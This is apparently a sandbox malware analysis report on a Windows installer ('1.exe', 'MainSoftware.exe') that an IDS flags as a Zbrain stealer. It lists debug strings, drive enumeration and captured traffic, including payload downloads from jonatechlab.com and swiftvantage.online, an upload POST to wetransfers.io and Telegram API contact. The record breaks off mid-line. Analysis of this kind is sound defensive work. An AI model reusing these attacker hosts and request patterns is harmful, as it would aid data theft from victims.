    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000010.00000002.2141619079.0000027536038000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141673495.0000027536061000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbp source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000004.00000002.2258821783.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 00000004.00000000.1278293993.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000002.2228034287.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000000.1506124351.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000010.00000002.2143619192.00000275384D7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2143996373.0000027538601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538476000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000010.00000002.2167406026.00007FF7D9618000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2143876894.00000275385C3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143920191.00000275385D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000010.00000002.2141698149.0000027536080000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141733839.00000275360A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbG source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2140154271.00000234A0702000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000010.00000002.2143603521.00000275384C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143558064.00000275384B4000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261349602.000002BDD0C71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000010.00000002.2139801818.000002349ED73000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139872986.000002349ED81000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: C:\Users\user\Desktop\1.exe File opened: z:
    Source: C:\Users\user\Desktop\1.exe File opened: x:
    Source: C:\Users\user\Desktop\1.exe File opened: v:
    Source: C:\Users\user\Desktop\1.exe File opened: t:
    Source: C:\Users\user\Desktop\1.exe File opened: r:
    Source: C:\Users\user\Desktop\1.exe File opened: p:
    Source: C:\Users\user\Desktop\1.exe File opened: n:
    Source: C:\Users\user\Desktop\1.exe File opened: l:
    Source: C:\Users\user\Desktop\1.exe File opened: j:
    Source: C:\Users\user\Desktop\1.exe File opened: h:
    Source: C:\Users\user\Desktop\1.exe File opened: f:
    Source: C:\Users\user\Desktop\1.exe File opened: b:
    Source: C:\Users\user\Desktop\1.exe File opened: y:
    Source: C:\Users\user\Desktop\1.exe File opened: w:
    Source: C:\Users\user\Desktop\1.exe File opened: u:
    Source: C:\Users\user\Desktop\1.exe File opened: s:
    Source: C:\Users\user\Desktop\1.exe File opened: q:
    Source: C:\Users\user\Desktop\1.exe File opened: o:
    Source: C:\Users\user\Desktop\1.exe File opened: m:
    Source: C:\Users\user\Desktop\1.exe File opened: k:
    Source: C:\Users\user\Desktop\1.exe File opened: i:
    Source: C:\Users\user\Desktop\1.exe File opened: g:
    Source: C:\Users\user\Desktop\1.exe File opened: e:
    Source: C:\Program Files (x86)\Main\MainSoftware.exe File opened: c:
    Source: C:\Users\user\Desktop\1.exe File opened: a:
    Source: Yara match File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_009B5800 FindFirstFileW,GetLastError,FindClose,11_2_009B5800
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_00873CB0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,11_2_00873CB0
    Source: C:\Users\user\Desktop\1.exe Code function: 11_2_008931C0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,11_2_008931C0
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe File opened: C:\Users\user\AppData\Local\Adobe\

    Networking

    Source: Network traffic Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49701 -> 104.21.80.136:443
    Source: Network traffic Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49703 -> 104.21.80.136:443
    Source: C:\Windows\System32\regsvr32.exe Network Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exe Network Connect: 172.67.184.211 443
    Source: unknown DNS query: name: api.telegram.org
    Source: global traffic HTTP traffic detected: POST /install/new HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000 Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
    Source: global traffic HTTP traffic detected: GET /install/whattoinstall/4c2d4fd1-9d88-4973-a75e-9b3ee4edf911 HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: POST /logs/telemetry HTTP/1.1 Host: jonatechlab.com Content-Type: application/json Content-Length: 660
    Source: global traffic HTTP traffic detected: POST /logs/telemetry HTTP/1.1 Host: jonatechlab.com Content-Type: application/json Content-Length: 133
    Source: global traffic HTTP traffic detected: POST /logs/telemetry HTTP/1.1 Host: jonatechlab.com Content-Type: application/json Content-Length: 172
    Source: global traffic HTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: POST /logs/telemetry HTTP/1.1 Host: swiftvantage.online Content-Type: application/json Content-Length: 1338
    Source: global traffic HTTP traffic detected: POST /logs/telemetry HTTP/1.1 Host: jonatechlab.com Content-Type: application/json Content-Length: 375
    Source: global traffic HTTP traffic detected: POST /uplo.php HTTP/1.1 Host: wetransfers.io Accept: */* Content-Length: 898 Content-Type: multipart/form-data; boundary=------------------------Iv7PtROXsQsuvFVbIKIWnT
    Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox View IP Address: 172.67.184.211 172.67.184.211
    Source: Joe Sandbox View IP Address: 104.21.80.136 104.21.80.136
    Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic HTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe HTTP/1.1 Accept: */* User-Agent: AdvancedInstaller Host: swiftvantage.online Connection: Keep-Alive Cache-Control: no-cache
    Source: global traffic HTTP traffic detected: GET /tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg HTTP/1.1 Accept: */* User-Agent: AdvancedInstaller Host: swiftvantage.online Connection: Keep-Alive Cache-Control: no-cache
    Source: global traffic HTTP traffic detected: GET /install/whattoinstall/4c2d4fd1-9d88-4973-a75e-9b3ee4edf911 HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic HTTP traffic detected: GET /v.php HTTP/1.1 Host: wetransfers.io User-Agent: curl/7.83.1 Accept: */*
    Source: global traffic DNS traffic detected: DNS query: swiftvantage.online
    Source: global traffic DNS traffic detected: DNS query: jonatechlab.com
    Source: global traffic DNS traffic detected: DNS query: wetransfers.io
    Source: global traffic DNS traffic detected: DNS query: api.telegram.org
    Source: unknown HTTP traffic detected: POST /install/new HTTP/1.1 Host: jonatechlab.com X-API-Key: 123e4567-e89b-12d3-a456-426614174000 Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://.css
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://.jpg
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.co
    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 